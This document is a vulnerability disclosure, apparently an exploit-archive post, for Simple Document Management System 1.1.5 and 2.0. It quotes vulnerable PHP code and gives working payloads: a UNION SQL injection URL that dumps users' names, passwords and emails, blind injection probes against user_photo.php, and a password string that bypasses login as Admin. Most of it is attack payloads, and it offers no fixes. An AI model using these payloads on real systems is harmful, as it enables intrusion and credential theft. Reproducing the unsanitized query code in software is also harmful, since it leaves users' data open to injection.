Simple Document Management System 1.1.5 / 2.0 Multiple Vulnerabilities bug found by Jose Luis Gongora Fernandez (a.k.a) JosS twitter: @JossGongora contact: sys-project[at]hotmail[dot]com website: http://www.hack0wn.com/ download: http://mirror.us.cc.com.au/pub/cafuego/sdms ----------- version 2.0 ----------- ~~ [Multiple SQL] /list.php?folder_id=['foo] /detail.php?doc_id=['foo] <code> line 13: if(isset($_GET['folder_id'])) $folder_id = $_GET['folder_id']; ... line 48: if(isset($order)) { $query = "SELECT id,name FROM folders WHERE parent=$folder_id ORDER BY ". rawurldecode($order); } else { $query = "SELECT id,name FROM folders WHERE parent=$folder_id"; } </code> .xpl! :: /list.php?folder_id=-10+union+all+select+1,1,1,concat_ws(char(58),user,pass,name,email),1,1,1,1,1,1,0+from+users-- ~~ [Blind] /user_photo.php?view=[foo] <code> $query = "SELECT photo,mime FROM users_info WHERE id=".$_GET['view']; $res = mysql_query($query, $sql); if( mysql_num_rows($res) == 1 ) { $row = mysql_fetch_array($res); header( "Content-type: $row[mime]" ); echo "". base64_decode($row[photo]) .""; } else { echo "Badness!\n"; } </code> .poc! :: /user_photo.php?view=2+and+1=1 /user_photo.php?view=2+and+1=2 ------------- version 1.1.5 ------------- ~~ [Auth Bypass] /login.php <code> $result = @mysql_query("SELECT pass != PASSWORD('$pass') FROM users WHERE user='$login'"); $row = @mysql_fetch_array($result); if( $row[0] != 0 ) { header("Location: index.php"); exit; } $result = @mysql_query("SELECT id,name FROM users WHERE user='$login'"); $row = @mysql_fetch_array($result); $id = $row[id]; $name = $row[name]; </code> .xpl! :: user: Admin password: ') FROM users WHERE id=-1 UNION SELECT 0 FROM users -- __h0__